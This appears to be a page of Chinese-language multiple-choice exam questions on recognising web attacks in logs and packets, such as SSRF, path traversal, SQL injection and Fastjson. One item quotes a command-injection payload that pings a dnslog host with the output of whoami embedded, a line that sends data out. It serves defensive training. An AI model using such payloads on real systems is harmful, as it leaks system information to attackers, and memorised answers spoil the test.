單項(xiàng)選擇題當(dāng)日志中頻繁出現(xiàn)內(nèi)網(wǎng)IP地址,如127.0.0.1,192.168.1.1等,可能是攻擊者進(jìn)行什么漏洞嘗試()

A.SSRF漏洞攻擊
B.代碼執(zhí)行漏洞攻擊
C.命令執(zhí)行漏洞攻擊
D.任意文件讀取


您可能感興趣的試卷

你可能感興趣的試題

1.單項(xiàng)選擇題請(qǐng)求url為/env,/actuator/env字樣,可以判斷出后端使用的是()

A.Weblogic
B.Tomcat
C.Apache
D.Springboot

2.單項(xiàng)選擇題攻擊數(shù)據(jù)包中出現(xiàn)多個(gè)"../"字樣,則最有可能是攻擊者進(jìn)行哪項(xiàng)漏洞攻擊()

A.xss漏洞攻擊
B.xml注入漏洞攻擊
C.命令執(zhí)行漏洞攻擊
D.任意文件讀取

4.單項(xiàng)選擇題網(wǎng)絡(luò)數(shù)據(jù)包中出現(xiàn)ping `whoami`.aaa.dnslog.com,攻擊者最有可能的目的是哪項(xiàng)()

A.xss漏洞攻擊
B.單純執(zhí)行ping命令
C.把whoami命令執(zhí)行結(jié)果,通過(guò)dns域名顯示出來(lái)
D.SQL注入漏洞攻擊

6.單項(xiàng)選擇題網(wǎng)絡(luò)數(shù)據(jù)包中出現(xiàn)wget、curl等字眼時(shí),說(shuō)明攻擊者最有可能采取以下哪種漏洞攻擊()

A.xss漏洞攻擊
B.xml注入漏洞攻擊
C.命令執(zhí)行漏洞攻擊
D.SQL注入漏洞攻擊

7.單項(xiàng)選擇題在攻擊數(shù)據(jù)包中,出現(xiàn)select、database()、user()、version()等字眼,可能是以下哪種攻擊()

A.xss漏洞攻擊
B.ssrf漏洞攻擊
C.文件上傳漏洞攻擊
D.SQL注入漏洞攻擊

8.單項(xiàng)選擇題在攻擊數(shù)據(jù)包中,出現(xiàn)@type的字眼,可能是以下哪種攻擊()

A.ssrf漏洞攻擊
B.Log4j漏洞攻擊
C.csrf漏洞攻擊
D.Fastjson漏洞攻擊

最新試題

漏洞掃描的對(duì)象包括以下哪些()

題型:多項(xiàng)選擇題

下列哪種備份類型備份所有更改的文件并標(biāo)記為已備份()

題型:?jiǎn)雾?xiàng)選擇題

在PKI系統(tǒng)中,受理、錄入、審核并批準(zhǔn)或否決用戶的證書申請(qǐng)(或廢除請(qǐng)求)的機(jī)構(gòu)稱為是()

題型:?jiǎn)雾?xiàng)選擇題

下面對(duì)于WindowsDNS日志功能的說(shuō)法,其中錯(cuò)誤的是()

題型:?jiǎn)雾?xiàng)選擇題

網(wǎng)絡(luò)與信息安全漏洞和隱患發(fā)現(xiàn)人員在開展網(wǎng)絡(luò)與信息安全漏洞和隱患發(fā)現(xiàn)相關(guān)工作時(shí),禁止破壞被測(cè)系統(tǒng)及相關(guān)數(shù)據(jù)完整性,可能會(huì)破壞被測(cè)系統(tǒng)及相關(guān)數(shù)據(jù)完整性的高危操作包括()

題型:多項(xiàng)選擇題

有效的網(wǎng)絡(luò)安全政策應(yīng)包括()

題型:多項(xiàng)選擇題

下列哪種安全控制技術(shù)基于定義和強(qiáng)制安全策略()

題型:?jiǎn)雾?xiàng)選擇題

在制定安全策略時(shí),應(yīng)考慮哪個(gè)因素來(lái)保護(hù)組織的機(jī)密信息()

題型:?jiǎn)雾?xiàng)選擇題

在物理安全中,下列哪種措施可以防止未經(jīng)授權(quán)的人員進(jìn)入機(jī)房()

題型:?jiǎn)雾?xiàng)選擇題

下列哪種安全威脅旨在誘使用戶泄露個(gè)人信息,如銀行賬戶密碼()

題型:?jiǎn)雾?xiàng)選擇題